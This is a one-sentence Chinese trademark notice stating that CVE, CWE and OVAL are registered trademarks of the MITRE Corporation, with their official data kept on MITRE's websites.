CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站